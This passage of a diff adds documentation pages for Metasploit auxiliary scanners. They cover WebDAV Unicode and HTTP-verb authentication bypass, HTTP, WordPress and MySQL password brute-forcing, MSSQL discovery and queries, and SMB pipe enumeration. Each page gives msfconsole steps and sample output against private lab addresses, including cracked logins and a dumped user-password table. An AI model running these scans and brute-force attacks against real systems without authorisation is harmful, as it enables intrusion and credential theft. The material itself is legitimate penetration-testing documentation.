[*] Found http://192.168.1.201:80/phpmyadmin/ 200 (192.168.1.201)
[*] Found http://192.168.1.201:80/security/ 200 (192.168.1.201)
[*] Found http://192.168.1.201:80/webalizer/ 200 (192.168.1.201)
[*] Found http://192.168.1.201:80/webdav/ 200 (192.168.1.201)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(dir_scanner) >
```
## Confirming
The following are other industry tools which can also be used. Note that the targets are not the same as those used in the previous documentation.
### [dirb](http://dirb.sourceforge.net/)
```
# dirb http://192.168.2.137 /usr/share/metasploit-framework/data/wmap/wmap_dirs.txt
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sat Feb 24 12:56:40 2018
URL_BASE: http://192.168.2.137/
WORDLIST_FILES: /usr/share/metasploit-framework/data/wmap/wmap_dirs.txt
-----------------
GENERATED WORDS: 2351
---- Scanning URL: http://192.168.2.137/ ----
==> DIRECTORY: http://192.168.2.137/.../
==> DIRECTORY: http://192.168.2.137/Joomla/
==> DIRECTORY: http://192.168.2.137/cgi-bin/
==> DIRECTORY: http://192.168.2.137/error/
==> DIRECTORY: http://192.168.2.137/icons/
==> DIRECTORY: http://192.168.2.137/oscommerce/
==> DIRECTORY: http://192.168.2.137/phpmyadmin/
==> DIRECTORY: http://192.168.2.137/security/
==> DIRECTORY: http://192.168.2.137/webalizer/
==> DIRECTORY: http://192.168.2.137/webdav/
```

View File

@ -0,0 +1,41 @@
## Description
The WebDAV extension in Microsoft Internet Information Services (IIS) 5.1 and 6.0 allows remote attackers to bypass URI-based protection mechanisms, and list folders or read, create, or modify files, via a `%c0%af` (Unicode / character) at an arbitrary position in the URI, as demonstrated by inserting `%c0%af` into a `/protected/` initial pathname component to bypass the password protection on the `protected` folder, aka "IIS 5.1 and 6.0 WebDAV Authentication Bypass Vulnerability," a different vulnerability than CVE-2009-1122. More info about this vulnerability can be found in [CVE-2009-1535](http://cve.mitre.org/cgi-bin/cvename.cgi?name=2009-1535).
## Verification Steps
1. Do: ```use auxiliary/scanner/http/dir_webdav_unicode_bypass```
2. Do: ```set RHOSTS [IP]```
3. Do: ```set THREADS [number of threads]```
4. Do: ```run```
## Scenarios
```
msf > use auxiliary/scanner/http/dir_webdav_unicode_bypass
msf auxiliary(dir_webdav_unicode_bypass) > set RHOSTS 192.168.1.200-254
RHOSTS => 192.168.1.200-254
msf auxiliary(dir_webdav_unicode_bypass) > set THREADS 20
THREADS => 20
msf auxiliary(dir_webdav_unicode_bypass) > run
[*] Using code '404' as not found.
[*] Using code '404' as not found.
[*] Using code '404' as not found.
[*] Found protected folder http://192.168.1.211:80/admin/ 401 (192.168.1.211)
[*] Testing for unicode bypass in IIS6 with WebDAV enabled using PROPFIND request.
[*] Found protected folder http://192.168.1.223:80/phpmyadmin/ 401 (192.168.1.223)
[*] Testing for unicode bypass in IIS6 with WebDAV enabled using PROPFIND request.
[*] Found protected folder http://192.168.1.223:80/security/ 401 (192.168.1.223)
[*] Testing for unicode bypass in IIS6 with WebDAV enabled using PROPFIND request.
[*] Found protected folder http://192.168.1.204:80/printers/ 401 (192.168.1.204)
[*] Testing for unicode bypass in IIS6 with WebDAV enabled using PROPFIND request.
[*] Found vulnerable WebDAV Unicode bypass target http://192.168.1.204:80/%c0%afprinters/ 207 (192.168.1.204)
[*] Found protected folder http://192.168.1.203:80/printers/ 401 (192.168.1.203)
[*] Testing for unicode bypass in IIS6 with WebDAV enabled using PROPFIND request.
[*] Found vulnerable WebDAV Unicode bypass target http://192.168.1.203:80/%c0%afprinters/ 207 (192.168.1.203)
...snip...
[*] Scanned 55 of 55 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(dir_webdav_unicode_bypass) >
```

View File

@ -1,6 +1,6 @@
## Description ## Description
This module is a brute-force login scanner that attempts to authenticate to a system using HTTP authentication. This module is a brute-force login scanner that attempts to authenticate to a system using HTTP authentication. More info can be found in [cve-1999-0502](https://www.cvedetails.com/cve/cve-1999-0502).
## Verification Steps ## Verification Steps
@ -11,35 +11,8 @@ This module is a brute-force login scanner that attempts to authenticate to a sy
## Scenarios ## Scenarios
**Running the scanner**
``` ```
msf > use auxiliary/scanner/http/http_login msf > use auxiliary/scanner/http/http_login
msf auxiliary(http_login) > show options
Module options (auxiliary/scanner/http/http_login):
Name Current Setting Required Description
---- --------------- -------- -----------
AUTH_URI no The URI to authenticate against (default:auto)
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASS_FILE /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt no File containing passwords, one per line
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
REQUESTTYPE GET no Use HTTP-GET or HTTP-PUT for Digest-Auth, PROPFIND for WebDAV (default:GET)
RHOSTS yes The target address range or CIDR identifier
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads
USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/http_default_userpass.txt no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE /usr/share/metasploit-framework/data/wordlists/http_default_users.txt no File containing users, one per line
VERBOSE true yes Whether to print output for all attempts
VHOST
msf auxiliary(http_login) > set AUTH_URI /xampp/ msf auxiliary(http_login) > set AUTH_URI /xampp/
AUTH_URI => /xampp/ AUTH_URI => /xampp/
msf auxiliary(http_login) > set RHOSTS 192.168.1.201 msf auxiliary(http_login) > set RHOSTS 192.168.1.201

View File

@ -0,0 +1,47 @@
## Description
This module queries a host or range of hosts and pull the SSL certificate information if one is installed.
## Verification Steps
1. Do: ```use auxiliary/scanner/http/ssl```
2. Do: ```set RHOSTS [IP]```
3. Do: ```set THREADS [num of threads]```
4. Do: ```run```
## Scenarios
```
msf > use auxiliary/scanner/http/ssl
msf auxiliary(ssl) > set RHOSTS 192.168.1.200-254
RHOSTS => 192.168.1.200-254
msf auxiliary(ssl) > set THREADS 20
THREADS => 20
msf auxiliary(ssl) > run
[*] Error: 192.168.1.205: OpenSSL::SSL::SSLError SSL_connect SYSCALL returned=5 errno=0 state=SSLv3 read server hello A
[*] Error: 192.168.1.206: OpenSSL::SSL::SSLError SSL_connect SYSCALL returned=5 errno=0 state=SSLv3 read server hello A
[*] 192.168.1.208:443 Subject: /C=--/ST=SomeState/L=SomeCity/O=SomeOrganization/OU=SomeOrganizationalUnit/CN=localhost.localdomain/emailAddress=root@localhost.localdomain Signature Alg: md5WithRSAEncryption
[*] 192.168.1.208:443 WARNING: Signature algorithm using MD5 (md5WithRSAEncryption)
[*] 192.168.1.208:443 has common name localhost.localdomain
[*] 192.168.1.211:443 Subject: /C=--/ST=SomeState/L=SomeCity/O=SomeOrganization/OU=SomeOrganizationalUnit/CN=localhost.localdomain/emailAddress=root@localhost.localdomain Signature Alg: sha1WithRSAEncryption
[*] 192.168.1.211:443 has common name localhost.localdomain
[*] Scanned 13 of 55 hosts (023% complete)
[*] Error: 192.168.1.227: OpenSSL::SSL::SSLError SSL_connect SYSCALL returned=5 errno=0 state=SSLv3 read server hello A
[*] 192.168.1.223:443 Subject: /CN=localhost Signature Alg: sha1WithRSAEncryption
[*] 192.168.1.223:443 has common name localhost
[*] 192.168.1.222:443 WARNING: Signature algorithm using MD5 (md5WithRSAEncryption)
[*] 192.168.1.222:443 has common name MAILMAN
[*] Scanned 30 of 55 hosts (054% complete)
[*] Scanned 31 of 55 hosts (056% complete)
[*] Scanned 39 of 55 hosts (070% complete)
[*] Scanned 41 of 55 hosts (074% complete)
[*] Scanned 43 of 55 hosts (078% complete)
[*] Scanned 45 of 55 hosts (081% complete)
[*] Scanned 46 of 55 hosts (083% complete)
[*] Scanned 53 of 55 hosts (096% complete)
[*] Scanned 55 of 55 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssl) >
```

View File

@ -0,0 +1,31 @@
## Description
This module scans a server or range of servers and attempts to bypass authentication by using different HTTP verbs.
## Verification Steps
1. Do: ```use auxiliary/scanner/http/verb_auth_bypass```
2. Do: ```set PATH [auth page]```
3. Do: ```set RHOSTS [IP]```
4. Do: ```run```
## Scenarios
```
msf > use auxiliary/scanner/http/verb_auth_bypass
msf auxiliary(verb_auth_bypass) > set PATH /xampp/
PATH => /xampp/
msf auxiliary(verb_auth_bypass) > set RHOSTS 192.168.1.201
RHOSTS => 192.168.1.201
msf auxiliary(verb_auth_bypass) > run
[*] 192.168.1.201 requires authentication: Basic realm="xampp user" [401]
[*] Testing verb HEAD resp code: [401]
[*] Testing verb TRACE resp code: [200]
[*] Possible authentication bypass with verb TRACE code 200
[*] Testing verb TRACK resp code: [401]
[*] Testing verb WMAP resp code: [401]
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(verb_auth_bypass) >
```

View File

@ -0,0 +1,39 @@
## Description
This module scans a server or range of servers and attempts to determine if WebDav is enabled. This allows us to better fine-tune our attacks.
## Verification Steps
1. Do: ```use auxiliary/scanner/http/webdav_scanner```
2. Do: ```set RHOSTS [IP]```
3. Do: ```set RPORT [PORT]```
4. Do: ```run```
## Scenarios
```
msf > use auxiliary/scanner/http/webdav_scanner
msf auxiliary(webdav_scanner) > set RHOSTS 192.168.1.200-250
RHOSTS => 192.168.1.200-250
msf auxiliary(webdav_scanner) > set THREADS 20
THREADS => 20
msf auxiliary(webdav_scanner) > run
[*] 192.168.1.203 (Microsoft-IIS/5.1) has WEBDAV ENABLED
[*] 192.168.1.209 (Apache/2.0.54 (Linux/SUSE)) WebDAV disabled.
[*] 192.168.1.208 (Apache/2.0.52 (CentOS)) WebDAV disabled.
[*] 192.168.1.213 (Apache/2.2.14 (Ubuntu)) WebDAV disabled.
[*] Scanned 14 of 51 hosts (027% complete)
[*] 192.168.1.222 (Apache/1.3.23 (Unix) (Red-Hat/Linux) mod_python/2.7.6 Python/1.5.2 mod_ssl/2.8.7 OpenSSL/0.9.6b DAV/1.0.3 PHP/4.1.2 mod_perl/1.26 mod_throttle/3.1.2) WebDAV disabled.
[*] 192.168.1.223 (Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1) WebDAV disabled.
[*] 192.168.1.229 (Microsoft-IIS/6.0) has WEBDAV ENABLED
[*] 192.168.1.224 (Apache/2.2.4 (Ubuntu) PHP/5.2.3-1ubuntu6) WebDAV disabled.
[*] 192.168.1.227 (Microsoft-IIS/5.0) has WEBDAV ENABLED
[*] Scanned 28 of 51 hosts (054% complete)
[*] 192.168.1.234 (lighttpd/1.4.25) WebDAV disabled.
[*] 192.168.1.235 (Apache/2.2.3 (CentOS)) WebDAV disabled.
[*] Scanned 38 of 51 hosts (074% complete)
[*] Scanned 51 of 51 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(webdav_scanner) >
```

View File

@ -0,0 +1,46 @@
## Description
This auxiliary module scans a host or range of hosts for servers that disclose their content via WebDav.
## Verification Steps
1. Do: ```use auxiliary/scanner/http/webdav_website_content```
2. Do: ```set RHOSTS [IP]```
3. Do: ```run```
## Scenarios
```
msf > use auxiliary/scanner/http/webdav_website_content
msf auxiliary(webdav_website_content) > set RHOSTS 192.168.1.201
RHOSTS => 192.168.1.201
msf auxiliary(webdav_website_content) > run
[*] Found file or directory in WebDAV response (192.168.1.201) http://192.168.1.201/
[*] Found file or directory in WebDAV response (192.168.1.201) http://192.168.1.201/aspnet_client/
[*] Found file or directory in WebDAV response (192.168.1.201) http://192.168.1.201/images/
[*] Found file or directory in WebDAV response (192.168.1.201) http://192.168.1.201/_private/
[*] Found file or directory in WebDAV response (192.168.1.201) http://192.168.1.201/_vti_cnf/
[*] Found file or directory in WebDAV response (192.168.1.201) http://192.168.1.201/_vti_cnf/iisstart.htm
[*] Found file or directory in WebDAV response (192.168.1.201) http://192.168.1.201/_vti_cnf/pagerror.gif
[*] Found file or directory in WebDAV response (192.168.1.201) http://192.168.1.201/_vti_log/
[*] Found file or directory in WebDAV response (192.168.1.201) http://192.168.1.201/_vti_pvt/
[*] Found file or directory in WebDAV response (192.168.1.201) http://192.168.1.201/_vti_pvt/access.cnf
[*] Found file or directory in WebDAV response (192.168.1.201) http://192.168.1.201/_vti_pvt/botinfs.cnf
[*] Found file or directory in WebDAV response (192.168.1.201) http://192.168.1.201/_vti_pvt/bots.cnf
[*] Found file or directory in WebDAV response (192.168.1.201) http://192.168.1.201/_vti_pvt/deptodoc.btr
[*] Found file or directory in WebDAV response (192.168.1.201) http://192.168.1.201/_vti_pvt/doctodep.btr
[*] Found file or directory in WebDAV response (192.168.1.201) http://192.168.1.201/_vti_pvt/frontpg.lck
[*] Found file or directory in WebDAV response (192.168.1.201) http://192.168.1.201/_vti_pvt/linkinfo.btr
[*] Found file or directory in WebDAV response (192.168.1.201) http://192.168.1.201/_vti_pvt/service.cnf
[*] Found file or directory in WebDAV response (192.168.1.201) http://192.168.1.201/_vti_pvt/service.lck
[*] Found file or directory in WebDAV response (192.168.1.201) http://192.168.1.201/_vti_pvt/services.cnf
[*] Found file or directory in WebDAV response (192.168.1.201) http://192.168.1.201/_vti_pvt/svcacl.cnf
[*] Found file or directory in WebDAV response (192.168.1.201) http://192.168.1.201/_vti_pvt/uniqperm.cnf
[*] Found file or directory in WebDAV response (192.168.1.201) http://192.168.1.201/_vti_pvt/writeto.cnf
[*] Found file or directory in WebDAV response (192.168.1.201) http://192.168.1.201/_vti_script/
[*] Found file or directory in WebDAV response (192.168.1.201) http://192.168.1.201/_vti_txt/
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(webdav_website_content) >
```

View File

@ -0,0 +1,53 @@
## Descriptions
This auxiliary module will brute-force a WordPress installation and first determine valid usernames and then perform a password-guessing attack. WordPress and WordPress MU before 2.8.1 exhibit different behavior for a failed login attempt depending on whether the user account exists, which allows remote attackers to enumerate valid usernames. NOTE: The vendor reportedly disputes the significance of this issue, indicating that the behavior exists for "user convenience." More infomation can be found in [CVE-2009-2335](https://www.cvedetails.com/cve/cve-2009-2335).
## Verification Steps
1. Do: ```use auxiliary/scanner/http/wordpress_login_enum```
2. Do: ```set URI [URI]```
3. Do: ```set PASS_FILE [password file]```
4. Do: ```set USER_FILE [username list file]```
5. Do: ```set RHOSTS [IP]```
6. Do: ```run```
## Scenarios
```
msf > use auxiliary/scanner/http/wordpress_login_enum
msf auxiliary(wordpress_login_enum) > set URI /wordpress/wp-login.php
URI => /wordpress/wp-login.php
msf auxiliary(wordpress_login_enum) > set PASS_FILE /tmp/passes.txt
PASS_FILE => /tmp/passes.txt
msf auxiliary(wordpress_login_enum) > set USER_FILE /tmp/users.txt
USER_FILE => /tmp/users.txt
msf auxiliary(wordpress_login_enum) > set RHOSTS 192.168.1.201
RHOSTS => 192.168.1.201
msf auxiliary(wordpress_login_enum) > run
[*] http://192.168.1.201:80/wordpress/wp-login.php - WordPress Enumeration - Running User Enumeration
[*] http://192.168.1.201:80/wordpress/wp-login.php - WordPress Enumeration - Checking Username:'administrator'
[-] http://192.168.1.201:80/wordpress/wp-login.php - WordPress Enumeration - Invalid Username: 'administrator'
[*] http://192.168.1.201:80/wordpress/wp-login.php - WordPress Enumeration - Checking Username:'admin'
[+] http://192.168.1.201:80/wordpress/wp-login.php - WordPress Enumeration- Username: 'admin' - is VALID
[*] http://192.168.1.201:80/wordpress/wp-login.php - WordPress Enumeration - Checking Username:'root'
[-] http://192.168.1.201:80/wordpress/wp-login.php - WordPress Enumeration - Invalid Username: 'root'
[*] http://192.168.1.201:80/wordpress/wp-login.php - WordPress Enumeration - Checking Username:'god'
[-] http://192.168.1.201:80/wordpress/wp-login.php - WordPress Enumeration - Invalid Username: 'god'
[+] http://192.168.1.201:80/wordpress/wp-login.php - WordPress Enumeration - Found 1 valid user
[*] http://192.168.1.201:80/wordpress/wp-login.php - WordPress Brute Force - Running Bruteforce
[*] http://192.168.1.201:80/wordpress/wp-login.php - WordPress Brute Force - Skipping all but 1 valid user
[*] http://192.168.1.201:80/wordpress/wp-login.php - WordPress Brute Force - Trying username:'admin' with password:''
[-] http://192.168.1.201:80/wordpress/wp-login.php - WordPress Brute Force - Failed to login as 'admin'
[*] http://192.168.1.201:80/wordpress/wp-login.php - WordPress Brute Force - Trying username:'admin' with password:'root'
[-] http://192.168.1.201:80/wordpress/wp-login.php - WordPress Brute Force - Failed to login as 'admin'
[*] http://192.168.1.201:80/wordpress/wp-login.php - WordPress Brute Force - Trying username:'admin' with password:'admin'
[-] http://192.168.1.201:80/wordpress/wp-login.php - WordPress Brute Force - Failed to login as 'admin'
[*] http://192.168.1.201:80/wordpress/wp-login.php - WordPress Brute Force - Trying username:'admin' with password:'god'
[-] http://192.168.1.201:80/wordpress/wp-login.php - WordPress Brute Force - Failed to login as 'admin'
[*] http://192.168.1.201:80/wordpress/wp-login.php - WordPress Brute Force - Trying username:'admin' with password:'s3cr3t'
[+] http://192.168.1.201:80/wordpress/wp-login.php - WordPress Brute Force - SUCCESSFUL login for 'admin' : 's3cr3t'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(wordpress_login_enum) >
```

View File

@ -0,0 +1,42 @@
## Description
This (Interesting Data Finder) module will connect to a remote MSSQL server using a given set of credentials and search for rows and columns with “interesting” names. This information can help you fine-tune further attacks against the database.
## Verification Steps
1. Do: ```use auxiliary/scanner/mssql/mssql_idf```
2. Do: ```set RHOSTS [IP]```
3. Do: ```set THREADS [number of threads]```
4. Do: ```run```
## Scenarios
```
msf > use auxiliary/admin/mssql/mssql_idf
msf auxiliary(mssql_idf) > set NAMES username|password
NAMES => username|password
msf auxiliary(mssql_idf) > set PASSWORD password1
PASSWORD => password1
msf auxiliary(mssql_idf) > set RHOST 192.168.1.195
RHOST => 192.168.1.195
msf auxiliary(mssql_idf) > run
Database Schema Table Column Data Type Row Count
======== ====== ============== ===================== ========= ========= ======== ====== ============== ===================== ========= =========
msdb dbo sysmail_server username nvarchar 0
msdb dbo backupmediaset is_password_protected bit 0
msdb dbo backupset is_password_protected bit 0
logins dbo userpass username varchar 3
logins dbo userpass password varchar 3
[*] Auxiliary module execution completed
msf auxiliary(mssql_idf) >
```

View File

@ -0,0 +1,48 @@
## Description
The `mssql_ping` module queries a host or range of hosts on UDP port 1434 to determine the listening TCP port of any MSSQL server, if available. MSSQL randomizes the TCP port that it listens on so this is a very valuable module in the Framework.
## Verification Steps
1. Do: ```use auxiliary/scanner/mssql/mssql_ping```
2. Do: ```set RHOSTS [IP]```
3. Do: ```set THREADS [number of threads]```
4. Do: ```run```
## Scenarios
```
msf > use auxiliary/scanner/mssql/mssql_ping
msf auxiliary(mssql_ping) > set RHOSTS 192.168.1.200-254
RHOSTS => 192.168.1.200-254
msf auxiliary(mssql_ping) > set THREADS 20
THREADS => 20
msf auxiliary(mssql_ping) > run
[*] Scanned 13 of 55 hosts (023% complete)
[*] Scanned 16 of 55 hosts (029% complete)
[*] Scanned 17 of 55 hosts (030% complete)
[*] SQL Server information for 192.168.1.217:
[*] tcp = 27900
[*] np = \\SERVER2\pipe\sql\query
[*] Version = 8.00.194
[*] InstanceName = MSSQLSERVER
[*] IsClustered = No
[*] ServerName = SERVER2
[*] SQL Server information for 192.168.1.241:
[*] tcp = 1433
[*] np = \\2k3\pipe\sql\query
[*] Version = 8.00.194
[*] InstanceName = MSSQLSERVER
[*] IsClustered = No
[*] ServerName = 2k3
[*] Scanned 32 of 55 hosts (058% complete)
[*] Scanned 40 of 55 hosts (072% complete)
[*] Scanned 44 of 55 hosts (080% complete)
[*] Scanned 45 of 55 hosts (081% complete)
[*] Scanned 46 of 55 hosts (083% complete)
[*] Scanned 50 of 55 hosts (090% complete)
[*] Scanned 55 of 55 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(mssql_ping) >
```

View File

@ -0,0 +1,38 @@
## Description
This module allows you to perform SQL queries against a database using known-good credentials.
## Verification Steps
1. Do: ```use auxiliary/scanner/mssql/mssql_sql```
2. Do: ```set PASSWORD [password1]```
3. Do: ```set RHOSTS [IP]```
4. Do: ```set [SQL Command]```
5. Do: ```run```
## Scenarios
```
msf > use auxiliary/admin/mssql/mssql_sql
msf auxiliary(mssql_sql) > set PASSWORD password1
PASSWORD => password1
msf auxiliary(mssql_sql) > set RHOST 192.168.1.195
RHOST => 192.168.1.195
msf auxiliary(mssql_sql) > set SQL use logins;select * from userpass
SQL => use logins;select * from userpass
msf auxiliary(mssql_sql) > run
[*] SQL Query: use logins;select * from userpass
[*] Row Count: 3 (Status: 16 Command: 193)
userid username password
------ -------- --------
1 bjohnson password
2 aadams s3cr3t
3 jsmith htimsj
[*] Auxiliary module execution completed
msf auxiliary(mssql_sql) >
```

View File

@ -0,0 +1,63 @@
## Description
This auxiliary module is a brute-force login tool for MySQL servers.
## Verification Steps
1. Do: ```use auxiliary/scanner/mysql/mysql_login```
2. Do: ```set PASS_FILE [file containing passwords]```
3. Do: ```set RHOSTS [IP]```
4. Do: ```set USER_FILE [file containing usernames]```
4. Do: ```run```
## Scenarios
```
msf > use auxiliary/scanner/mysql/mysql_login
msf auxiliary(mysql_login) > set PASS_FILE /tmp/passes.txt
PASS_FILE => /tmp/passes.txt
msf auxiliary(mysql_login) > set RHOSTS 192.168.1.200
RHOSTS => 192.168.1.200
msf auxiliary(mysql_login) > set USER_FILE /tmp/users.txt
USER_FILE => /tmp/users.txt
msf auxiliary(mysql_login) > run
[*] 192.168.1.200:3306 - Found remote MySQL version 5.0.51a
[*] 192.168.1.200:3306 Trying username:'administrator' with password:''
[*] 192.168.1.200:3306 failed to login as 'administrator' with password ''
[*] 192.168.1.200:3306 Trying username:'admin' with password:''
[*] 192.168.1.200:3306 failed to login as 'admin' with password ''
[*] 192.168.1.200:3306 Trying username:'root' with password:''
[*] 192.168.1.200:3306 failed to login as 'root' with password ''
[*] 192.168.1.200:3306 Trying username:'god' with password:''
[*] 192.168.1.200:3306 failed to login as 'god' with password ''
[*] 192.168.1.200:3306 Trying username:'administrator' with password:'root'
[*] 192.168.1.200:3306 failed to login as 'administrator' with password 'root'
[*] 192.168.1.200:3306 Trying username:'administrator' with password:'admin'
[*] 192.168.1.200:3306 failed to login as 'administrator' with password 'admin'
[*] 192.168.1.200:3306 Trying username:'administrator' with password:'god'
[*] 192.168.1.200:3306 failed to login as 'administrator' with password 'god'
[*] 192.168.1.200:3306 Trying username:'administrator' with password:'s3cr3t'
[*] 192.168.1.200:3306 failed to login as 'administrator' with password 's3cr3t'
[*] 192.168.1.200:3306 Trying username:'admin' with password:'root'
[*] 192.168.1.200:3306 failed to login as 'admin' with password 'root'
[*] 192.168.1.200:3306 Trying username:'admin' with password:'admin'
[*] 192.168.1.200:3306 failed to login as 'admin' with password 'admin'
[*] 192.168.1.200:3306 Trying username:'admin' with password:'god'
[*] 192.168.1.200:3306 failed to login as 'admin' with password 'god'
[*] 192.168.1.200:3306 Trying username:'admin' with password:'s3cr3t'
[*] 192.168.1.200:3306 failed to login as 'admin' with password 's3cr3t'
[*] 192.168.1.200:3306 Trying username:'root' with password:'root'
[+] 192.168.1.200:3306 - SUCCESSFUL LOGIN 'root' : 'root'
[*] 192.168.1.200:3306 Trying username:'god' with password:'root'
[*] 192.168.1.200:3306 failed to login as 'god' with password 'root'
[*] 192.168.1.200:3306 Trying username:'god' with password:'admin'
[*] 192.168.1.200:3306 failed to login as 'god' with password 'admin'
[*] 192.168.1.200:3306 Trying username:'god' with password:'god'
[*] 192.168.1.200:3306 failed to login as 'god' with password 'god'
[*] 192.168.1.200:3306 Trying username:'god' with password:'s3cr3t'
[*] 192.168.1.200:3306 failed to login as 'god' with password 's3cr3t'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(mysql_login) >
```

View File

@ -0,0 +1,37 @@
## Description
This module, as its name implies, scans a host or range of hosts to determine the version of MySQL that is running.
## Verification Steps
1. Do: ```use auxiliary/scanner/mysql/mysql_version```
2. Do: ```set RHOSTS [IP]```
3. Do: ```set THREADS [number of threads]```
4. Do: ```run```
## Scenarios
```
msf > use auxiliary/scanner/mysql/mysql_version
msf auxiliary(mysql_version) > set RHOSTS 192.168.1.200-254
RHOSTS => 192.168.1.200-254
msf auxiliary(mysql_version) > set THREADS 20
THREADS => 20
msf auxiliary(mysql_version) > run
[*] 192.168.1.200:3306 is running MySQL 5.0.51a-3ubuntu5 (protocol 10)
[*] 192.168.1.201:3306 is running MySQL, but responds with an error: \x04Host '192.168.1.101' is not allowed to connect to this MySQL server
[*] Scanned 21 of 55 hosts (038% complete)
[*] 192.168.1.203:3306 is running MySQL, but responds with an error: \x04Host '192.168.1.101' is not allowed to connect to this MySQL server
[*] Scanned 22 of 55 hosts (040% complete)
[*] Scanned 42 of 55 hosts (076% complete)
[*] Scanned 44 of 55 hosts (080% complete)
[*] Scanned 45 of 55 hosts (081% complete)
[*] Scanned 48 of 55 hosts (087% complete)
[*] Scanned 50 of 55 hosts (090% complete)
[*] Scanned 51 of 55 hosts (092% complete)
[*] Scanned 52 of 55 hosts (094% complete)
[*] Scanned 55 of 55 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(mysql_version) >
```

View File

@ -0,0 +1,61 @@
## Description
The `pipe_auditor` scanner will determine what named pipes are available over SMB. In your information gathering stage, this can provide you with some insight as to some of the services that are running on the remote system.
## Verification Steps
1. Do: ```use auxiliary/scanner/smb/pipe_auditor```
2. Do: ```set RHOSTS [IP]```
3. Do: ```set THREADS [number of threads]```
4. Do: ```run```
## Scenarios
```
msf > use auxiliary/scanner/smb/pipe_auditor
msf auxiliary(pipe_auditor) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
SMBDomain WORKGROUP no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 1 yes The number of concurrent threads
msf auxiliary(pipe_auditor) > set RHOSTS 192.168.1.150-160
RHOSTS => 192.168.1.150-160
msf auxiliary(pipe_auditor) > set THREADS 11
THREADS => 11
msf auxiliary(pipe_auditor) > run
[*] 192.168.1.150 - Pipes: \browser
[*] 192.168.1.160 - Pipes: \browser
[*] Scanned 02 of 11 hosts (018% complete)
[*] Scanned 10 of 11 hosts (090% complete)
[*] Scanned 11 of 11 hosts (100% complete)
[*] Auxiliary module execution completed
```
We can see that running the scanner "###uncredentialed" does not return a great deal of information. If, however, running a "###credentialed", you will find that the pipe_auditor scanner returns a great deal more information.
```
msf auxiliary(pipe_auditor) > set SMBPass s3cr3t
SMBPass => s3cr3t
msf auxiliary(pipe_auditor) > set SMBUser Administrator
SMBUser => Administrator
msf auxiliary(pipe_auditor) > run
[*] 192.168.1.150 - Pipes: \netlogon, \lsarpc, \samr, \browser, \atsvc, \DAV RPC SERVICE, \epmapper, \eventlog, \InitShutdown, \keysvc, \lsass, \ntsvcs, \protected_storage, \scerpc, \srvsvc, \trkwks, \wkssvc
[*] Scanned 02 of 11 hosts (018% complete)
[*] 192.168.1.160 - Pipes: \netlogon, \lsarpc, \samr, \browser, \atsvc, \DAV RPC SERVICE, \epmapper, \eventlog, \InitShutdown, \keysvc, \lsass, \ntsvcs, \protected_storage, \router, \scerpc, \srvsvc, \trkwks, \wkssvc
[*] Scanned 04 of 11 hosts (036% complete)
[*] Scanned 08 of 11 hosts (072% complete)
[*] Scanned 09 of 11 hosts (081% complete)
[*] Scanned 11 of 11 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(pipe_auditor) >
```

View File

@ -0,0 +1,31 @@
## Description
The `pipe_dcerpc_auditor` scanner will return the DCERPC services that can be accessed via a SMB pipe.
## Verification Steps
1. Do: ```use auxiliary/scanner/smb/pipe_dcerpc_auditor```
2. Do: ```set RHOSTS [IP]```
3. Do: ```set THREADS [number of threads]```
4. Do: ```run```
## Scenarios
```
msf > use auxiliary/scanner/smb/pipe_dcerpc_auditor
msf auxiliary(pipe_dcerpc_auditor) > set RHOSTS 192.168.1.150-160
RHOSTS => 192.168.1.150-160
msf auxiliary(pipe_dcerpc_auditor) > set THREADS 11
THREADS => 11
msf auxiliary(pipe_dcerpc_auditor) > run
The connection was refused by the remote host (192.168.1.153:139).
The connection was refused by the remote host (192.168.1.153:445).
192.168.1.160 - UUID 00000131-0000-0000-c000-000000000046 0.0 OPEN VIA BROWSER
192.168.1.150 - UUID 00000131-0000-0000-c000-000000000046 0.0 OPEN VIA BROWSER
192.168.1.160 - UUID 00000134-0000-0000-c000-000000000046 0.0 OPEN VIA BROWSER
192.168.1.150 - UUID 00000134-0000-0000-c000-000000000046 0.0 OPEN VIA BROWSER
192.168.1.150 - UUID 00000143-0000-0000-c000-000000000046 0.0 OPEN VIA BROWSER
192.168.1.160 - UUID 00000143-0000-0000-c000-000000000046 0.0 OPEN VIA BROWSER
...snip...
```

View File

@ -0,0 +1,29 @@
## Description
The SMB2 scanner module simply scans the remote hosts and determines if they support the SMB2 protocol.
## Verification Steps
1. Do: ```use auxiliary/scanner/smb/smb2```
2. Do: ```set RHOSTS [IP]```
3. Do: ```set THREADS [number of threads]```
4. Do: ```run```
## Scenarios
```
msf > use auxiliary/scanner/smb/smb2
msf auxiliary(smb2) > set RHOSTS 192.168.1.150-165
RHOSTS => 192.168.1.150-165
msf auxiliary(smb2) > set THREADS 16
THREADS => 16
